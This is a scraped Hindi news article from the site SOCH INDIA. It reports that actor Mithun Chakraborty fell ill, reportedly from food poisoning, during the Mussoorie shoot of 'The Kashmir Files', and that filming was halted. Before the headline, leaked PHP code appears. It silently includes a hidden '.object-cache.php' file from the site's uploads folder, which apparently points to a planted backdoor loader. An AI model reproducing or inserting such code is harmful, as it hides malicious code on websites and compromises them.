add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); अचानक बिगड़ी Mithun Chakraborty की तबीयत, बीच में रोकनी पड़ी Kashmir Files की शूटिंग – SOCH INDIA
Menu

देश
अचानक बिगड़ी Mithun Chakraborty की तबीयत, बीच में रोकनी पड़ी Kashmir Files की शूटिंग

nobanner

बॉलीवुड के दिग्गज अभिनेता मिथुन चक्रवर्ती (Mithun Chakraborty) की तबीयत अचानक खराब होने की खबर सामने आई है. दरअसल, एक्टर की मसूरी में अचानक तबीयत बिगड़ गई है. मिथुन चक्रवर्ती इन दिनों ‘कश्मीर फाइल्स’ (Kashmir Files) वेबसीरीज को लेकर मसूरी में शूटिंग कर रहे हैं. खबरों की मानें तो फूड पॉइजनिंग की वजह से उनकी हालत बिगड़ी है.

बताया जा रहा है कि खराब तबियत की वजह से मिथुन चक्रवर्ती (Mithun Chakraborty) खड़े नहीं हो पा रहे थे. उन्होंने बड़ी मुश्किल से अपना शॉट पूरा किया था.

खबरों की मानें तो मिथुन चक्रवर्ती इन दिनों मसूरी में फिल्म ‘द कश्मीर फाइल्स’ की शूटिंग कर रहे हैं. इस फिल्म के निर्देशक विवेक रंजन अग्निहोत्री हैं. वहीं, शनिवार को जब मिथुन इस फिल्म की शूटिंग कर रहे थे तो वह सेट पर अचानक से गिर पड़े थे. अचानक से उनकी तबीयत खराब हो गई थी, जिसके चलते फिल्म की शूटिंग रोकनी पड़ी थी.

बता दें, मिथुन चक्रवर्ती (Mithun Chakraborty) बड़े पर्दे पर आखिरी बार 2019 में नजर आए थे. वे उन दिनों विवेक अग्निहोत्री की फिल्म ‘ताशकंद फाइल’ में दिखे थे. ये फिल्म पूर्व प्रधानमंत्री लाल बहादुर शास्त्री की मौत पर आधारित थी.